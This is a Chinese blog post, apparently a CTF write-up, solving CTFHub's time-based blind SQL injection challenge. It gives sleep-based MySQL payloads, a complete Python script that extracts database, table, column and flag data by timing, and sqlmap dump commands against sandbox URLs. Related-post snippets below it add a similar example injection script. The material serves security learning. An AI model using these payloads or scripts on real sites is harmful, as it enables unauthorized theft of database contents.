CTFHub技能树笔记之WEB-SQL:时间盲注

已于 2022-04-12 11:27:45 修改
阅读量4k 收藏 1
点赞数
分类专栏: CTF SQL注入
于 2022-04-08 20:40:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/124050021
版权

SQL注入 Python脚本 sqlmap 数据库安全 信息爆取
关键词由CSDN通过智能技术生成

小白一个,如有错误请指正

这里使用两种解法

1.python脚本

2.sqlmap

一、需要用到的函数:

length()                 //返回字符串的长度

ascii()                   //返回一个字符的ascii码值

substr(字符串,开始位置,截取数量)                 //截取字符串

sleep()                  //时间注入的核心函数

if(判断语句,语句一,语句二)                         //条件为真返回语句一,则返回语句二 

二、语句

1.爆数据库长度

if(length(database())=数据库名长度,sleep(3),1)

2.爆数据库名

if(ascii(substr(database(),第i个字符,1))={ord(字符)},sleep(3),1)

3.爆表名

if(ascii(substr((select table_name from information_schema.tables where table_schema= '数据库名' limit 第i个表,1),{k},1))={ord(字符)},sleep(3),1)

4.爆字段名

if(ascii(substr((select column_name from information_schema.columns where table_name = '表名' limit 第i个字段,1),第j个字符,1))={ord(字符)},sleep(3),1)

5.爆具体值

if(ascii(substr((select '字段名' from '表名' limit 第i行数据,1),第j个字符,1))={ord(字符)},sleep(2),0)

三、脚本如下

说明:下面这个脚本是爆出数据库所有的数据,本人比较菜,没能很好的优化(其实是懒),所以写出的这个脚本运行时间很长,大家可以拿到改一下,毕竟能爆出flag就可以了~

import requests
import time

def database_name():
    database_length = 0
    database_name = ''
    for i in range(1, 20):
        start = time.time()
        url_1 = url + f'1 and if(length(database())={i},sleep(3),1)'
        res_1 = requests.get(url_1)
        end = time.time()
        if end - start >= 2.5:
            database_length = i
            break
    print('数据库长度为:', database_length)
    for k in range(1, database_length+1):
        for char in dict_flag:
            start = time.time()
            url_2 = url + f'1 and if(ascii(substr(database(),{k},1))={ord(char)},sleep(3),1)'
            # print(url_2)
            res_2 = requests.get(url_2)
            end = time.time()
            if end - start >= 2.5:
                database_name = database_name + char
    print('数据库名:' + database_name)
    return database_name

def tables_name(database_name):
    tables_name = []
    for table_number in range(0, 2):
        table_name = ''
        for k in range(0, 7):
            for char in dict_flag:
                start = time.time()
                url_3 = url + f'1 and if(ascii(substr((select table_name from information_schema.tables where table_schema= \'{database_name}\' limit {table_number},1),{k},1))={ord(char)},sleep(3),1)'
                # print(url_3)
                res_3 = requests.get(url_3)
                end = time.time()
                if end - start > 2.5:
                    table_name = table_name + char
        print('表名:', table_name)
        tables_name.append(table_name)
    # print(tables_name)
    return tables_name

def columns_name(tables_name):
    columns_name = []
    for table_name in tables_name:
        for column_number in range(0, 2):
            column_name = ''
            for k in range(0, 6):
                for char in dict_flag:
                    start = time.time()
                    url_4 = url + f'1 and if(ascii(substr((select column_name from information_schema.columns where table_name = \'{table_name}\' limit {column_number},1),{k},1))={ord(char)},sleep(3),1)'
                    # print(url_4)
                    res_4 = requests.get(url_4)
                    end = time.time()
                    if end - start > 2.5:
                        column_name = column_name + char
            if column_name != '':
                print(f'{table_name}表列名:', column_name)
                columns_name.append([table_name, column_name])
    # print(columns_name)
    return columns_name

def flag_data(tables_columns):
    for table_column in tables_columns:
        for k in range(0, 3):
            flag = ''
            for flag_number in range(1, 45):
                mark = 0    # 判断字段具体值是否读完
                for char in dict_flag:
                    start = time.time()
                    url_5 = url + f'1 and if(ascii(substr((select {table_column[1]} from {table_column[0]} limit {k},1),{flag_number},1))={ord(char)},sleep(2),0)'
                    # print(url_5)
                    res_5 = requests.get(url_5)
                    end = time.time()
                    if end - start > 1.5:
                        flag = flag + char
                        mark = 1
                if flag == '' or mark == 0:
                    break
            if flag == '':
                break
            print(f'{table_column[0]}->{table_column[1]}:' + flag)


if __name__ == '__main__':
    start_time =time.time()
    url = 'http://challenge-28732b148c98f2d4.sandbox.ctfhub.com:10800/?id='
    dict_flag = 'qwertyuiopasdfghjklzxcvbnm{}1234567890'
    database_name = database_name()
    tables_name = tables_name(database_name)
    tables_columns = columns_name(tables_name)
    flag_data(tables_columns)
    end_time = time.time()
    print(end_time - start_time)

效果如下:

四、使用sqlmap

1.按步骤来就可以了

sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 --dbs

sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli --tables

sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag --columns

sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag -C flag --dump

weixin_48799157
关注
专栏目录
视觉SLAM笔记(36) 3D-2D: PnP
氢键H-H
10-13 1万+
PnP、直接线性变换、P3P、光束平差法(Bundle Adjustment)、最小化重投影误差(Reprojection error)
Oracle学习笔记--- ORA-00911: invalid character 解决办法
杨鑫newlife的专栏
09-01 7248
Oracle学习笔记--- ORA-00911: invalid character 解决办法
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFHub 技能树时间盲注
qq_47271638的博客
05-27 1021
CTFHub 技能树时间盲注 首先需要知道时间盲注和布尔盲注一样都是需要大量的时间来整理组合自己所注入的集合 所以本篇主要介绍sqlmap和手工注入联合起来注入 具体步骤: 1.打开环境 判断注入类型 要么此处采用手工判断要么采用sqlmap判断 我们这里采用sqlmap判断 sqlmap初步判断类型为时间盲注 现在就可以自己构造手工注入语句: http://challenge-4e00395e736a4b55.sandbox.ctfhub.com:10080/?id=1 and if(mid(dat
SQL时间盲注
最新发布
2301_78549931的博客
08-05 1058
在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .如果数据库名的第一个字符的ascii码值等于115,则页面沉睡3秒,如果数据库名的第一个字符的ascii码值不等于115,则页面不沉睡。这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。根据表名知道可能用户的账户和密码是在users表中,接下来我们就是得到该表下的字段名以及内容。
时间盲注ctfhub
2401_82985722的博客
03-29 1527
(布尔盲注直接使用length进行筛选:按照length从高到低排序 前面四个即为结果,按照payload1的顺序进行排序得到数据库名sqli。(已经知道长度为4,可以直接设置为4,不知道时 设置比需要爆破字符的长度长。(5)点击开始攻击得到结果,sleep(5)要筛选出响应时间大于5s的数据包。condition为条件,条件为真时返回true,条件为假时返回false。再进行筛选,响应时间最大的四个就是执行成功的——sqli。# -D 指定库,-T指定表,-C 指定列(字段)(爆破字段为26个英文字母)
CTFHUB-技能树-Web题-SQL注入-时间盲注
Static______的博客
04-03 1031
1=1即为真,那么将会执行sleep(3),也就是睡眠3秒钟(默认单位为秒)那既然我们可以构造这个函数,我们就用这个函数来到时间盲注这个靶场尝试一下。得到四个库名,猜测flag最有可能在sqli中,尝试爆破表名来看看。1=1就是我们的条件,sleep(3)为我们的A,1为我们的B。说明即存在时间盲注,我们通过sqlmap可以直接跑出结果。庞大的工作量太过耗时,所以到此为止,开始sqlmap注入。得到表名为flag,news,猜测结果就在flag表中。到这我们已经了解了这个判断语句,那我们可以尝试。
CTFHub | 时间盲注
尼泊罗河伯的博客
11-02 1192
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。此题与前一题类似,同样使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 837
CTFHUB SQL
[RK3399][Android7.1] 调试笔记 --- USB:device descriptor read/64, error -32
Kris Fei's blog
11-14 6517
Platform: RK3399 OS: Android 7.1 Kernel: v4.4.83 现象: 由于rk3399四个usb口不能满足数量需求,对其中的usb3.0(非OTG口)进行外接Hub(用的是GL850)做扩展。 插上U盘后出现如下error: [ 41.443701] usb 2-1.1: device descriptor read/64, error -32 [ 41...
Dvwa之SQL盲注全级别学习笔记
Mbys_Lettuce的博客
09-19 1353
注入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII中97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
CTFHUB-WEB-SQL注入-时间盲注
weixin_43486981的博客
08-10 695
时间盲注手工注入时,可根据程序执行时间判断是否执行成功。 使用的函数: if(payload, sleep(10),1) 如果payload成功,程序暂停10秒,否则立即执行 题目: 靶机环境:输入1不会显现信息,也不会提示错误 使用sqlmap工具进行注入: 获取数据库名: Sqlmap –u http://challenge-a72828618ce90b15.sandbox.ctfhub.com:10080/?id=1 –dbs 获取表名: Sqlmap –u http://challenge-
CTFHub技能树web(持续更新)--SQL注入--时间盲注
jiuyongpinyin的博客
08-14 439
时间盲注 时间盲注和布尔盲注都是一个手动很费时间的一种注入,后者在上一篇文章提到过,时间盲注是通过返回数据的时间来判断返回的数据,所以我们这里直接使用sqlmap 首先我们爆破当前数据库: 接着我们爆破数据库中的表: 得到两个表,我们查看flag这个表里面的列: 得到flag这个列,查看这个列里面的字段: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
CTFhub 时间盲注
plant1234的博客
06-17 865
时间盲注: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
CTFHubWeb时间盲注
ndjnddjxn的博客
04-11 560
id=1” –dump -C “column_name” -T “table_name” -D “db_name” -v 0#获取字段内容。的情况下,用时间函数构造时间延后,由回显时间来获取数据,主要是利用sleep函数让sql语句的执行时间变长,常与if(1,2,3)函数连用如果1执行为ture则返回2,否则返回3.id=1” –columns -T “tablename” users-D “db_name” -v 0 #列字段。其他,如果我们的软件库中没有相应的软件包,那么我们可以从软件研发的团队的。
CTFHUB SQL注入——时间盲注 附自己写的脚本
wuuconix's blog
08-28 2631
介绍 时间盲注和上一篇布尔盲注一样都是盲注,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔盲注的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间盲注不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔盲注里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
CTF-时间盲注专题
PolarPeak的博客
04-25 2692
文章目录参考时间盲注Heavy QueryGet_lock()Rlikesleep2019hgame-week3-sqli2 `sleep`benchmark题pwnhub全宇宙最最简单的PHP博客系统 `Get_lock() Heavy Query` 参考 时间盲注 Heavy Query 个人认为这个方法是本题的最优解 原理就如方法的名字:大负荷查询 即用到一些消耗资源的方式让数据库的查询时间尽量变长 而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积,这样就可以让数据库的查询慢下来 而最后找到系统
CTFHub_技能树_WebSQL注入——时间盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写
Ho1aAs‘s Blog
12-22 1521
文章目录前言——时间盲注一、时间盲注原理时间盲注常用函数二、时间盲注Python脚本脚本使用事项Python3.0-3.7的版本Python3.8+的版本运行截图 前言——时间盲注 CTFHub_技能树_WebSQL注入——布尔盲注(含布尔盲注脚本) 时间盲注基本思路类似于布尔盲注,细节可以访问上方给出的文章链接,不同的是布尔盲注是通过回显的对错提示来判断是否成功,而时间盲注是通过手动控制页面返回时间来判断是否成功 一、时间盲注原理 时间盲注常用函数 以下是时间盲注常用的SQL语句: if(Bool
sql注入盲注python脚本
04-06
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的操作。而盲注是一种特殊类型的SQL注入攻击,攻击者无法直接获取数据库的具体信息,但可以通过不断尝试不同的条件来判断是否存在漏洞。 下面是一个使用Python编写的简单SQL注入盲注脚本的示例: ```python import requests def check_vulnerable(url): payload = "' OR 1=1 --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: return True else: return False def exploit_blind(url): result = "" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" while True: found = False for char in characters: payload = "' OR SUBSTRING((SELECT database()), 1, 1) = '" + char + "' --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: result += char found = True break if not found: break return result # 示例使用方法 url = "http://example.com/vulnerable_page" if check_vulnerable(url): database_name = exploit_blind(url) print("数据库名称:", database_name) else: print("目标网站不易受SQL注入攻击") ``` 上述脚本中,`check_vulnerable`函数用于检测目标网站是否易受SQL注入攻击,它通过在URL中插入特定的payload来判断是否存在漏洞。`exploit_blind`函数用于利用盲注漏洞获取数据库名称,它通过不断尝试不同的字符来逐个获取数据库名称的每个字符。 请注意,上述脚本仅为示例,实际使用时需要根据具体情况进行修改和扩展,同时要遵循法律和道德规范,仅在合法授权的范围内使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值